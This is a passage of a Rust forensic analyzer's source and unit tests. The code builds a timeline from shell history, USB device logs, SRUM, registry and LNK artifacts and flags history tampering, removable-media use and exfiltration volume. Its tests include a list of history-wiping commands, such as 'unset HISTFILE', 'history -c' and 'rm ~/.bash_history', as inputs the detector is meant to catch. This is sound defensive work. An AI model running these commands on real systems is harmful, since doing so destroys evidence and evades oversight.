894fn file_on_external_device_finding(
895    device: &UserActivity,
896    file: &UserActivity,
897    src: &Source,
898) -> Finding {
899    let path = match &file.subject {
900        Subject::File { path, .. } | Subject::Folder { path, .. } => path.as_str(),
901        _ => file.detail.as_str(), // cov:unreachable: join only pairs File/Folder subjects here
902    };
903    let dev_id = match &device.subject {
904        Subject::Device { id, .. } => id.as_str(),
905        _ => device.detail.as_str(), // cov:unreachable: join only pairs Device subjects here
906    };
907    let serial = match &device.subject {
908        Subject::Device {
909            volume_serial: Some(s),
910            ..
911        } => *s,
912        _ => 0, // cov:unreachable: join requires Device { volume_serial: Some(_) }
913    };
914    Finding::observation(
915        Severity::Medium,
916        Category::Threat,
917        "USERACT-FILE-ON-EXTERNAL-DEVICE",
918    )
919    .source(src.clone())
920    .note(format!(
921        "a user accessed {path:?} on a volume (serial {serial:#010x}) whose serial matches the \
922         connected external device {dev_id:?}; consistent with data movement to/from removable \
923         media (MITRE T1052 / T1091)"
924    ))
925    .evidence("file", path.to_string())
926    .evidence("device", dev_id.to_string())
927    .evidence("volume_serial", format!("{serial:#010x}"))
928    .external_ref(ExternalRef::mitre_attack("T1052"))
929    .external_ref(ExternalRef::mitre_attack("T1091"))
930    .build()
931}
932
933#[cfg(test)]
934mod tests {
935    use super::*;
936    use peripheral_core::{Bus, Provenance, Stamp};
937    use shellhist_core::{HistoryEntry, Shell};
938
939    fn entry(cmd: &str, ts: Option<i64>) -> HistoryEntry {
940        HistoryEntry {
941            shell: Shell::Bash,
942            command: cmd.to_string(),
943            timestamp: ts,
944            elapsed: None,
945            paths: Vec::new(),
946        }
947    }
948
949    fn device(
950        instance_id: &str,
951        bus: Bus,
952        first_install: Option<i64>,
953        vol: Option<u32>,
954    ) -> DeviceConnection {
955        DeviceConnection {
956            bus,
957            device_class_guid: None,
958            vid: None,
959            pid: None,
960            device_serial: None,
961            serial_is_os_generated: false,
962            friendly_name: None,
963            device_instance_id: instance_id.to_string(),
964            first_install: first_install.map(Stamp::authoritative),
965            last_install: None,
966            last_arrival: None,
967            last_removal: None,
968            parent_id_prefix: None,
969            volume_guid: None,
970            drive_letter: None,
971            volume_serial: vol,
972            disk_signature: None,
973            dma_capable: bus.is_dma_capable(),
974            mitre: Vec::new(),
975            source: Provenance {
976                file: "setupapi.dev.log".to_string(),
977                line: 1,
978            },
979        }
980    }
981
982    // ── from_shell_history ────────────────────────────────────────────────────
983
984    #[test]
985    fn shell_command_becomes_executed_activity() {
986        let entries = [entry("ls -la /tmp", Some(1_700_000_000))];
987        let acts = from_shell_history(&entries, None);
988        assert_eq!(acts.len(), 1);
989        assert_eq!(acts[0].action, Action::Executed);
990        assert_eq!(acts[0].source, SourceKind::ShellHistory);
991        assert_eq!(acts[0].timestamp, Some(1_700_000_000));
992        assert_eq!(acts[0].subject, Subject::Command("ls -la /tmp".to_string()));
993        assert_eq!(acts[0].actor, None);
994    }
995
996    #[test]
997    fn shell_actor_is_carried_when_known() {
998        let entries = [entry("whoami", None)];
999        let acts = from_shell_history(&entries, Some("alice"));
1000        assert_eq!(acts[0].actor.as_deref(), Some("alice"));
1001    }
1002
1003    #[test]
1004    fn history_clearing_command_becomes_tampered() {
1005        for cmd in [
1006            "unset HISTFILE",
1007            "history -c",
1008            "export HISTFILE=/dev/null",
1009            "Clear-History",
1010            "rm ~/.bash_history",
1011        ] {
1012            let entries = [entry(cmd, Some(1))];
1013            let acts = from_shell_history(&entries, None);
1014            assert_eq!(acts[0].action, Action::HistoryTampered);
1015        }
1016    }
1017
1018    #[test]
1019    fn benign_command_is_not_tampered() {
1020        let entries = [entry("git log --oneline", Some(1))];
1021        let acts = from_shell_history(&entries, None);
1022        assert_eq!(acts[0].action, Action::Executed);
1023    }
1024
1025    // ── from_device_connections ───────────────────────────────────────────────
1026
1027    #[test]
1028    fn device_becomes_connected_with_volume_serial() {
1029        let conns = [device(
1030            "USBSTOR\\Disk&Ven_SanDisk\\1234567890AB",
1031            Bus::Usb,
1032            Some(1_700_000_500),
1033            Some(0xDEAD_BEEF),
1034        )];
1035        let acts = from_device_connections(&conns);
1036        assert_eq!(acts.len(), 1);
1037        assert_eq!(acts[0].action, Action::Connected);
1038        assert_eq!(acts[0].source, SourceKind::PeripheralDevice);
1039        assert_eq!(acts[0].timestamp, Some(1_700_000_500));
1040        assert_eq!(
1041            acts[0].subject,
1042            Subject::Device {
1043                id: "USBSTOR\\Disk&Ven_SanDisk\\1234567890AB".to_string(),
1044                volume_serial: Some(0xDEAD_BEEF),
1045            }
1046        );
1047    }
1048
1049    #[test]
1050    fn device_timestamp_falls_back_through_stamps() {
1051        let mut conn = device("USB\\VID_0781", Bus::Usb, None, None);
1052        conn.last_arrival = Some(Stamp::inferred(42));
1053        let acts = from_device_connections(&[conn]);
1054        assert_eq!(acts[0].timestamp, Some(42));
1055    }
1056
1057    #[test]
1058    fn device_without_any_stamp_has_no_timestamp() {
1059        let conn = device("USB\\VID_0781", Bus::Usb, None, None);
1060        let acts = from_device_connections(&[conn]);
1061        assert_eq!(acts[0].timestamp, None);
1062    }
1063
1064    // ── build_timeline ────────────────────────────────────────────────────────
1065
1066    #[test]
1067    fn timeline_merges_and_sorts_by_timestamp() {
1068        let entries = [entry("late", Some(300)), entry("early", Some(100))];
1069        let conns = [device("USBSTOR\\x", Bus::Usb, Some(200), None)];
1070        let shell = ShellHistorySource::new(&entries);
1071        let devices = DeviceSource::new(&conns);
1072        let tl = build_timeline(&[&shell, &devices]);
1073        let ts: Vec<Option<i64>> = tl.iter().map(|e| e.timestamp).collect();
1074        assert_eq!(ts, vec![Some(100), Some(200), Some(300)]);
1075    }
1076
1077    #[test]
1078    fn timeline_orders_untimestamped_events_last_and_stably() {
1079        let entries = [
1080            entry("no_ts_a", None),
1081            entry("ts", Some(50)),
1082            entry("no_ts_b", None),
1083        ];
1084        let shell = ShellHistorySource::new(&entries);
1085        let tl = build_timeline(&[&shell]);
1086        assert_eq!(tl[0].timestamp, Some(50));
1087        assert_eq!(tl[1].detail, "no_ts_a");
1088        assert_eq!(tl[2].detail, "no_ts_b");
1089    }
1090
1091    // ── audit: USERACT-HISTORY-TAMPERED ───────────────────────────────────────
1092
1093    #[test]
1094    fn audit_surfaces_history_tampered() {
1095        let entries = [entry("unset HISTFILE", Some(10))];
1096        let acts = from_shell_history(&entries, None);
1097        let findings = audit(&acts);
1098        let f = findings
1099            .iter()
1100            .find(|f| f.code == "USERACT-HISTORY-TAMPERED")
1101            .expect("history-tampered finding must fire");
1102        assert_eq!(f.severity, Some(Severity::Medium));
1103        assert_eq!(f.category, Category::Concealment);
1104    }
1105
1106    // ── audit: USERACT-EXEC-DURING-REMOVABLE-MEDIA ────────────────────────────
1107
1108    #[test]
1109    fn audit_fires_exec_during_removable_media_within_window() {
1110        let entries = [entry("tar czf /media/usb/out.tgz .", Some(1_000))];
1111        let conns = [device("USBSTOR\\Disk", Bus::Usb, Some(1_500), None)];
1112        let shell = ShellHistorySource::new(&entries);
1113        let devices = DeviceSource::new(&conns);
1114        let tl = build_timeline(&[&shell, &devices]);
1115        let findings = audit(&tl);
1116        assert!(findings
1117            .iter()
1118            .any(|f| f.code == "USERACT-EXEC-DURING-REMOVABLE-MEDIA"));
1119    }
1120
1121    #[test]
1122    fn audit_does_not_fire_outside_window() {
1123        let entries = [entry("ls", Some(1_000))];
1124        let conns = [device(
1125            "USBSTOR\\Disk",
1126            Bus::Usb,
1127            Some(1_000 + REMOVABLE_MEDIA_WINDOW_SECS + 1),
1128            None,
1129        )];
1130        let shell = ShellHistorySource::new(&entries);
1131        let devices = DeviceSource::new(&conns);
1132        let tl = build_timeline(&[&shell, &devices]);
1133        let findings = audit(&tl);
1134        assert!(findings
1135            .iter()
1136            .all(|f| f.code != "USERACT-EXEC-DURING-REMOVABLE-MEDIA"));
1137    }
1138
1139    #[test]
1140    fn audit_does_not_fire_for_non_mass_storage_device() {
1141        // A Bluetooth HID device is NOT mass storage → no exec-during-media finding.
1142        let entries = [entry("ls", Some(1_000))];
1143        let conns = [device("BTHENUM\\Dev", Bus::Bluetooth, Some(1_000), None)];
1144        let shell = ShellHistorySource::new(&entries);
1145        let devices = DeviceSource::new(&conns);
1146        let tl = build_timeline(&[&shell, &devices]);
1147        let findings = audit(&tl);
1148        assert!(findings
1149            .iter()
1150            .all(|f| f.code != "USERACT-EXEC-DURING-REMOVABLE-MEDIA"));
1151    }
1152
1153    #[test]
1154    fn audit_with_custom_source_stamps_scope() {
1155        let entries = [entry("history -c", Some(1))];
1156        let acts = from_shell_history(&entries, None);
1157        let findings = audit_with(&acts, &source("CASE-001/host-7"));
1158        let f = &findings[0];
1159        assert_eq!(f.source.scope, "CASE-001/host-7");
1160        assert_eq!(f.source.analyzer, "useract-forensic");
1161    }
1162
1163    // ── findings are observations, never verdicts ─────────────────────────────
1164
1165    #[test]
1166    fn findings_are_hedged_observations_never_verdicts() {
1167        let entries = [
1168            entry("unset HISTFILE", Some(1_000)),
1169            entry("cp x /media/usb", Some(1_010)),
1170        ];
1171        let conns = [device("USBSTOR\\Disk", Bus::Usb, Some(1_005), None)];
1172        let shell = ShellHistorySource::new(&entries);
1173        let devices = DeviceSource::new(&conns);
1174        let tl = build_timeline(&[&shell, &devices]);
1175        let findings = audit(&tl);
1176        assert!(!findings.is_empty());
1177        for f in &findings {
1178            let note = f.note.to_ascii_lowercase();
1179            assert!(!note.contains("proves"));
1180            assert!(!note.contains("confirms"));
1181            assert!(!note.contains("definitely"));
1182            assert!(note.contains("consistent with"));
1183        }
1184    }
1185
1186    // ── volume-serial join seam (v0.2 activation, proven by construction) ──────
1187
1188    #[test]
1189    fn volume_serial_join_is_empty_for_v01_sources() {
1190        // v0.1 emits no File/Folder subjects carrying a volume serial → no joins.
1191        let conns = [device("USBSTOR\\Disk", Bus::Usb, Some(1), Some(0x1234))];
1192        let acts = from_device_connections(&conns);
1193        assert!(device_file_volume_joins(&acts).is_empty());
1194    }
1195
1196    #[test]
1197    fn volume_serial_join_lights_up_for_a_v02_style_file_event() {
1198        // A synthetic v0.2-shape File activity advertising the same volume serial as
1199        // a connected device joins to it — proving the seam is correct by construction.
1200        let conns = [device("USBSTOR\\Disk", Bus::Usb, Some(1), Some(0x1234))];
1201        let mut acts = from_device_connections(&conns);
1202        acts.push(UserActivity {
1203            timestamp: Some(2),
1204            actor: None,
1205            action: Action::Accessed,
1206            subject: Subject::file("\\\\?\\E:\\secret.docx"),
1207            source: SourceKind::PeripheralDevice, // placeholder
1208            detail: "opened E:\\secret.docx vol:4660".to_string(), // 0x1234 == 4660
1209        });
1210        let joins = device_file_volume_joins(&acts);
1211        assert_eq!(joins, vec![(0, 1)]);
1212    }
1213
1214    #[test]
1215    fn volume_serial_join_ignores_mismatched_serials() {
1216        let conns = [device("USBSTOR\\Disk", Bus::Usb, Some(1), Some(0x1234))];
1217        let mut acts = from_device_connections(&conns);
1218        acts.push(UserActivity {
1219            timestamp: Some(2),
1220            actor: None,
1221            action: Action::Accessed,
1222            subject: Subject::file("x"),
1223            source: SourceKind::PeripheralDevice,
1224            detail: "vol:9999".to_string(),
1225        });
1226        assert!(device_file_volume_joins(&acts).is_empty());
1227    }
1228
1229    #[test]
1230    fn volume_serial_join_skips_files_without_a_volume_token() {
1231        // A folder activity that advertises no `vol:` token never joins (the
1232        // file_volume_serial None path).
1233        let conns = [device("USBSTOR\\Disk", Bus::Usb, Some(1), Some(0x1234))];
1234        let mut acts = from_device_connections(&conns);
1235        acts.push(UserActivity {
1236            timestamp: Some(2),
1237            actor: None,
1238            action: Action::Accessed,
1239            subject: Subject::folder("E:\\photos"),
1240            source: SourceKind::PeripheralDevice,
1241            detail: "opened folder with no serial hint".to_string(),
1242        });
1243        // And a file whose `vol:` token is non-numeric (parse Err path) also never joins.
1244        acts.push(UserActivity {
1245            timestamp: Some(3),
1246            actor: None,
1247            action: Action::Accessed,
1248            subject: Subject::file("E:\\x"),
1249            source: SourceKind::PeripheralDevice,
1250            detail: "vol:notanumber".to_string(),
1251        });
1252        assert!(device_file_volume_joins(&acts).is_empty());
1253    }
1254
1255    #[test]
1256    fn history_tampered_finding_falls_back_to_detail_for_non_command_subject() {
1257        // Defensive: a HistoryTampered activity whose subject is not a Command still
1258        // produces a finding, using detail for the command text.
1259        let act = UserActivity {
1260            timestamp: Some(1),
1261            actor: None,
1262            action: Action::HistoryTampered,
1263            subject: Subject::file("ConsoleHost_history.txt"),
1264            source: SourceKind::ShellHistory,
1265            detail: "Remove-Item ConsoleHost_history.txt".to_string(),
1266        };
1267        let findings = audit(&[act]);
1268        assert_eq!(findings.len(), 1);
1269        assert_eq!(findings[0].code, "USERACT-HISTORY-TAMPERED");
1270        assert!(findings[0]
1271            .note
1272            .contains("Remove-Item ConsoleHost_history.txt"));
1273    }
1274
1275    #[test]
1276    fn is_mass_storage_id_classifies_bare_and_separated_ids() {
1277        assert!(is_mass_storage_id("USBSTOR\\Disk&Ven"));
1278        assert!(is_mass_storage_id("USBSTOR"));
1279        assert!(!is_mass_storage_id("BTHENUM\\Dev"));
1280        assert!(!is_mass_storage_id(""));
1281    }
1282
1283    #[test]
1284    fn activitysource_trait_dispatches() {
1285        let entries = [entry("ls", Some(1))];
1286        let s = ShellHistorySource::for_actor(&entries, "bob");
1287        let acts: Vec<UserActivity> = s.activities();
1288        assert_eq!(acts[0].actor.as_deref(), Some("bob"));
1289    }
1290
1291    // ── SRUM adapter (v0.2) ───────────────────────────────────────────────────
1292
1293    use srum_core::{AppUsageRecord, IdMapEntry, NetworkUsageRecord};
1294
1295    fn utc(epoch: i64) -> chrono::DateTime<chrono::Utc> {
1296        chrono::DateTime::from_timestamp(epoch, 0).expect("valid epoch")
1297    }
1298
1299    #[test]
1300    fn srum_network_row_is_executed_and_actor_attributed() {
1301        // user_id and app_id are integers resolved through the id-map.
1302        let id_map = [
1303            IdMapEntry {
1304                id: 7,
1305                name: "S-1-5-21-1-2-3-1001".to_string(),
1306            },
1307            IdMapEntry {
1308                id: 42,
1309                name: "\\Device\\HarddiskVolume3\\Windows\\explorer.exe".to_string(),
1310            },
1311        ];
1312        let net = [NetworkUsageRecord {
1313            app_id: 42,
1314            user_id: 7,
1315            timestamp: utc(1_700_000_000),
1316            bytes_sent: 4096,
1317            bytes_recv: 1024,
1318            auto_inc_id: 0,
1319        }];
1320        let acts = from_srum(&net, &[], &id_map);
1321        assert_eq!(acts.len(), 1);
1322        let a = &acts[0];
1323        assert_eq!(a.action, Action::Executed);
1324        assert_eq!(a.source, SourceKind::Srum);
1325        assert_eq!(a.timestamp, Some(1_700_000_000));
1326        // First source that ATTRIBUTES to a specific user SID.
1327        assert_eq!(a.actor.as_deref(), Some("S-1-5-21-1-2-3-1001"));
1328        // App resolves through the id-map.
1329        assert_eq!(
1330            a.subject,
1331            Subject::Command("\\Device\\HarddiskVolume3\\Windows\\explorer.exe".to_string())
1332        );
1333        // Network volume surfaced in the detail.
1334        assert!(a.detail.contains("4096"));
1335        assert!(a.detail.contains("1024"));
1336    }
1337
1338    #[test]
1339    fn srum_unresolved_user_id_falls_back_to_numeric_token() {
1340        // No id-map entry for the user → actor is a stable synthetic token, never lost.
1341        let net = [NetworkUsageRecord {
1342            app_id: 1,
1343            user_id: 99,
1344            timestamp: utc(10),
1345            bytes_sent: 1,
1346            bytes_recv: 2,
1347            auto_inc_id: 0,
1348        }];
1349        let acts = from_srum(&net, &[], &[]);
1350        assert_eq!(acts.len(), 1);
1351        assert_eq!(acts[0].actor.as_deref(), Some("user-id:99"));
1352        // App also falls back when unresolved.
1353        assert_eq!(acts[0].subject, Subject::Command("app-id:1".to_string()));
1354    }
1355
1356    #[test]
1357    fn srum_app_usage_row_is_executed_and_actor_attributed() {
1358        let id_map = [
1359            IdMapEntry {
1360                id: 5,
1361                name: "S-1-5-21-9-9-9-500".to_string(),
1362            },
1363            IdMapEntry {
1364                id: 8,
1365                name: "C:\\Tools\\rclone.exe".to_string(),
1366            },
1367        ];
1368        let app = [AppUsageRecord {
1369            app_id: 8,
1370            user_id: 5,
1371            timestamp: utc(1_700_000_500),
1372            foreground_cycles: 900_000,
1373            background_cycles: 100,
1374            auto_inc_id: 0,
1375        }];
1376        let acts = from_srum(&[], &app, &id_map);
1377        assert_eq!(acts.len(), 1);
1378        assert_eq!(acts[0].action, Action::Executed);
1379        assert_eq!(acts[0].source, SourceKind::Srum);
1380        assert_eq!(acts[0].actor.as_deref(), Some("S-1-5-21-9-9-9-500"));
1381        assert_eq!(
1382            acts[0].subject,
1383            Subject::Command("C:\\Tools\\rclone.exe".to_string())
1384        );
1385    }
1386
1387    #[test]
1388    fn srum_source_adapter_dispatches() {
1389        let net = [NetworkUsageRecord {
1390            app_id: 1,
1391            user_id: 1,
1392            timestamp: utc(1),
1393            bytes_sent: 1,
1394            bytes_recv: 1,
1395            auto_inc_id: 0,
1396        }];
1397        let s = SrumSource::new(&net, &[], &[]);
1398        let acts = s.activities();
1399        assert_eq!(acts.len(), 1);
1400        assert_eq!(acts[0].source, SourceKind::Srum);
1401    }
1402
1403    // ── audit: USERACT-NETWORK-EXFIL-VOLUME (v0.2) ────────────────────────────
1404
1405    #[test]
1406    fn audit_fires_network_exfil_volume_above_threshold() {
1407        let id_map = [
1408            IdMapEntry {
1409                id: 7,
1410                name: "S-1-5-21-1-2-3-1001".to_string(),
1411            },
1412            IdMapEntry {
1413                id: 42,
1414                name: "rclone.exe".to_string(),
1415            },
1416        ];
1417        let net = [NetworkUsageRecord {
1418            app_id: 42,
1419            user_id: 7,
1420            timestamp: utc(1_700_000_000),
1421            bytes_sent: NETWORK_EXFIL_BYTES_THRESHOLD + 1,
1422            bytes_recv: 0,
1423            auto_inc_id: 0,
1424        }];
1425        let acts = from_srum(&net, &[], &id_map);
1426        let findings = audit(&acts);
1427        let f = findings
1428            .iter()
1429            .find(|f| f.code == "USERACT-NETWORK-EXFIL-VOLUME")
1430            .expect("network-exfil-volume must fire above threshold");
1431        assert_eq!(f.severity, Some(Severity::Medium));
1432        assert_eq!(f.category, Category::Threat);
1433    }
1434
1435    #[test]
1436    fn audit_does_not_fire_network_exfil_below_threshold() {
1437        let net = [NetworkUsageRecord {
1438            app_id: 1,
1439            user_id: 1,
1440            timestamp: utc(1),
1441            bytes_sent: NETWORK_EXFIL_BYTES_THRESHOLD - 1,
1442            bytes_recv: 0,
1443            auto_inc_id: 0,
1444        }];
1445        let acts = from_srum(&net, &[], &[]);
1446        let findings = audit(&acts);
1447        assert!(findings
1448            .iter()
1449            .all(|f| f.code != "USERACT-NETWORK-EXFIL-VOLUME"));
1450    }
1451
1452    #[test]
1453    fn audit_skips_exfil_check_for_srum_app_usage_rows() {
1454        // An app-usage SRUM row carries CPU cycles, not bytes, so its detail has no
1455        // bytes-sent prefix: the exfil check sees None and never fires (regardless
1456        // of how large the cycle counts are).
1457        let app = [AppUsageRecord {
1458            app_id: 1,
1459            user_id: 1,
1460            timestamp: utc(1),
1461            foreground_cycles: u64::MAX,
1462            background_cycles: u64::MAX,
1463            auto_inc_id: 0,
1464        }];
1465        let acts = from_srum(&[], &app, &[]);
1466        let findings = audit(&acts);
1467        assert!(findings
1468            .iter()
1469            .all(|f| f.code != "USERACT-NETWORK-EXFIL-VOLUME"));
1470    }
1471
1472    // ── winreg-artifacts adapter (v0.2) ───────────────────────────────────────
1473
1474    use winreg_artifacts::shellbags::ShellbagEntry;
1475    use winreg_artifacts::typed_urls::TypedUrl;
1476    use winreg_artifacts::userassist::UserAssistEntry;
1477
1478    fn ua(program: &str, run_count: u32, last_run: Option<&str>) -> UserAssistEntry {
1479        UserAssistEntry {
1480            program: program.to_string(),
1481            run_count,
1482            focus_count: 0,
1483            focus_duration_ms: 0,
1484            last_run: last_run.map(ToString::to_string),
1485            guid: "{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}".to_string(),
1486        }
1487    }
1488
1489    #[test]
1490    fn userassist_entry_becomes_executed_with_run_count() {
1491        let entries = [ua(
1492            "C:\\Windows\\System32\\cmd.exe",
1493            5,
1494            Some("2024-06-15T08:00:00Z"),
1495        )];
1496        let acts = from_userassist(&entries, Some("alice"));
1497        assert_eq!(acts.len(), 1);
1498        let a = &acts[0];
1499        assert_eq!(a.action, Action::Executed);
1500        assert_eq!(a.source, SourceKind::Registry);
1501        assert_eq!(
1502            a.subject,
1503            Subject::Command("C:\\Windows\\System32\\cmd.exe".to_string())
1504        );
1505        // ISO last_run is parsed to epoch (2024-06-15T08:00:00Z = 1718438400).
1506        assert_eq!(a.timestamp, Some(1_718_438_400));
1507        assert_eq!(a.actor.as_deref(), Some("alice"));
1508        // Run count carried in detail.
1509        assert!(a.detail.contains('5'));
1510    }
1511
1512    #[test]
1513    fn userassist_without_last_run_has_no_timestamp() {
1514        let entries = [ua("notepad.exe", 1, None)];
1515        let acts = from_userassist(&entries, None);
1516        assert_eq!(acts[0].timestamp, None);
1517        assert_eq!(acts[0].actor, None);
1518    }
1519
1520    #[test]
1521    fn typed_url_becomes_typed_activity() {
1522        let urls = [TypedUrl {
1523            url: "https://pastebin.com/abc".to_string(),
1524            last_visited: Some("2024-01-02T03:04:05Z".to_string()),
1525            is_suspicious: true,
1526            suspicious_reason: Some("suspicious domain: pastebin.com".to_string()),
1527        }];
1528        let acts = from_typed_urls(&urls, None);
1529        assert_eq!(acts.len(), 1);
1530        assert_eq!(acts[0].action, Action::Typed);
1531        assert_eq!(acts[0].source, SourceKind::Registry);
1532        assert_eq!(
1533            acts[0].subject,
1534            Subject::Query("https://pastebin.com/abc".to_string())
1535        );
1536        assert!(acts[0].timestamp.is_some());
1537    }
1538
1539    #[test]
1540    fn shellbag_becomes_accessed_folder() {
1541        let bags = [ShellbagEntry {
1542            path: "BagMRU[slot=0, size=120 bytes]".to_string(),
1543            key_path: "Software\\Microsoft\\Windows\\Shell\\BagMRU\\0".to_string(),
1544            last_written: Some("2024-03-04T05:06:07Z".to_string()),
1545            mru_order: vec!["0".to_string()],
1546        }];
1547        let acts = from_shellbags(&bags, Some("bob"));
1548        assert_eq!(acts.len(), 1);
1549        assert_eq!(acts[0].action, Action::Accessed);
1550        assert_eq!(acts[0].source, SourceKind::Registry);
1551        assert!(matches!(acts[0].subject, Subject::Folder { .. }));
1552        assert_eq!(acts[0].actor.as_deref(), Some("bob"));
1553    }
1554
1555    #[test]
1556    fn from_registry_merges_all_three_registry_artifacts() {
1557        let ua_entries = [ua("cmd.exe", 1, Some("2024-06-15T08:00:00Z"))];
1558        let urls = [TypedUrl {
1559            url: "https://x.test".to_string(),
1560            last_visited: None,
1561            is_suspicious: false,
1562            suspicious_reason: None,
1563        }];
1564        let bags = [ShellbagEntry {
1565            path: "BagMRU[slot=0, size=10 bytes]".to_string(),
1566            key_path: "k".to_string(),
1567            last_written: None,
1568            mru_order: vec![],
1569        }];
1570        let acts = from_registry(&ua_entries, &urls, &bags, Some("alice"));
1571        assert_eq!(acts.len(), 3);
1572        assert!(acts.iter().any(|a| a.action == Action::Executed));
1573        assert!(acts.iter().any(|a| a.action == Action::Typed));
1574        assert!(acts.iter().any(|a| a.action == Action::Accessed));
1575        assert!(acts.iter().all(|a| a.source == SourceKind::Registry));
1576        assert!(acts.iter().all(|a| a.actor.as_deref() == Some("alice")));
1577    }
1578
1579    #[test]
1580    fn registry_source_adapter_dispatches() {
1581        let ua_entries = [ua("cmd.exe", 1, None)];
1582        let s = RegistrySource::new(&ua_entries, &[], &[], None);
1583        let acts = s.activities();
1584        assert_eq!(acts.len(), 1);
1585        assert_eq!(acts[0].source, SourceKind::Registry);
1586    }
1587
1588    // ── LNK adapter (v0.2) ────────────────────────────────────────────────────
1589
1590    use lnk_core::{LinkInfo, ShellLink, ShellLinkHeader, StringData, VolumeId};
1591
1592    fn shell_link(
1593        local_base_path: Option<&str>,
1594        drive_serial: Option<u32>,
1595        write_time: i64,
1596        net_name: Option<&str>,
1597    ) -> ShellLink {
1598        let volume_id = drive_serial.map(|s| VolumeId {
1599            drive_type: lnk_core::drive_type::REMOVABLE,
1600            drive_serial_number: s,
1601            volume_label: None,
1602        });
1603        let cnrl = net_name.map(|n| lnk_core::CommonNetworkRelativeLink {
1604            net_name: Some(n.to_string()),
1605            device_name: None,
1606        });
1607        ShellLink {
1608            header: ShellLinkHeader {
1609                link_flags: 0,
1610                file_attributes: 0,
1611                creation_time: 0,
1612                access_time: 0,
1613                write_time,
1614                file_size: 0,
1615                icon_index: 0,
1616                show_command: 1,
1617                hotkey: 0,
1618            },
1619            link_target_idlist: None,
1620            link_info: Some(LinkInfo {
1621                volume_id,
1622                local_base_path: local_base_path.map(ToString::to_string),
1623                common_network_relative_link: cnrl,
1624            }),
1625            string_data: StringData::default(),
1626            tracker: None,
1627        }
1628    }
1629
1630    #[test]
1631    fn lnk_target_becomes_accessed_file_with_volume_serial() {
1632        let links = [shell_link(
1633            Some("E:\\secret.docx"),
1634            Some(0xDEAD_BEEF),
1635            1_700_000_000,
1636            None,
1637        )];
1638        let acts = from_lnk(&links, Some("alice"));
1639        assert_eq!(acts.len(), 1);
1640        let a = &acts[0];
1641        assert_eq!(a.action, Action::Accessed);
1642        assert_eq!(a.source, SourceKind::LnkFile);
1643        // The target write time becomes the activity timestamp.
1644        assert_eq!(a.timestamp, Some(1_700_000_000));
1645        assert_eq!(a.actor.as_deref(), Some("alice"));
1646        // The File subject carries the structured volume serial (the join key).
1647        assert_eq!(
1648            a.subject,
1649            Subject::File {
1650                path: "E:\\secret.docx".to_string(),
1651                volume_serial: Some(0xDEAD_BEEF),
1652            }
1653        );
1654    }
1655
1656    #[test]
1657    fn lnk_without_volume_id_has_no_serial() {
1658        let links = [shell_link(Some("C:\\x.txt"), None, 0, None)];
1659        let acts = from_lnk(&links, None);
1660        assert_eq!(acts.len(), 1);
1661        assert_eq!(
1662            acts[0].subject,
1663            Subject::File {
1664                path: "C:\\x.txt".to_string(),
1665                volume_serial: None,
1666            }
1667        );
1668        // write_time 0 (the FILETIME "not set" sentinel) → no timestamp.
1669        assert_eq!(acts[0].timestamp, None);
1670    }
1671
1672    #[test]
1673    fn lnk_network_target_falls_back_to_unc_path() {
1674        // No local_base_path, but a CommonNetworkRelativeLink net name → use it.
1675        let links = [shell_link(None, None, 5, Some("\\\\server\\share"))];
1676        let acts = from_lnk(&links, None);
1677        assert_eq!(acts.len(), 1);
1678        assert_eq!(
1679            acts[0].subject,
1680            Subject::File {
1681                path: "\\\\server\\share".to_string(),
1682                volume_serial: None,
1683            }
1684        );
1685    }
1686
1687    #[test]
1688    fn lnk_without_link_info_is_skipped() {
1689        // A link with no LinkInfo and no usable target is dropped, not crashed.
1690        let mut link = shell_link(None, None, 0, None);
1691        link.link_info = None;
1692        let acts = from_lnk(&[link], None);
1693        assert!(acts.is_empty());
1694    }
1695
1696    #[test]
1697    fn lnk_source_adapter_dispatches() {
1698        let links = [shell_link(Some("E:\\f"), Some(1), 1, None)];
1699        let s = LnkSource::new(&links, None);
1700        let acts = s.activities();
1701        assert_eq!(acts.len(), 1);
1702        assert_eq!(acts[0].source, SourceKind::LnkFile);
1703    }
1704
1705    // ── The volume-serial join activates end-to-end (LNK File ⋈ Device) ───────
1706
1707    #[test]
1708    fn lnk_file_joins_connected_device_on_volume_serial() {
1709        let links = [shell_link(
1710            Some("E:\\loot.zip"),
1711            Some(0xCAFE_F00D),
1712            100,
1713            None,
1714        )];
1715        let conns = [device(
1716            "USBSTOR\\Disk",
1717            Bus::Usb,
1718            Some(50),
1719            Some(0xCAFE_F00D),
1720        )];
1721        let lnk = LnkSource::new(&links, Some("alice"));
1722        let devices = DeviceSource::new(&conns);
1723        let timeline = build_timeline(&[&lnk, &devices]);
1724        let findings = audit(&timeline);
1725        let f = findings
1726            .iter()
1727            .find(|f| f.code == "USERACT-FILE-ON-EXTERNAL-DEVICE")
1728            .expect("file-on-external-device must fire when serials match");
1729        assert_eq!(f.severity, Some(Severity::Medium));
1730        assert_eq!(f.category, Category::Threat);
1731    }
1732}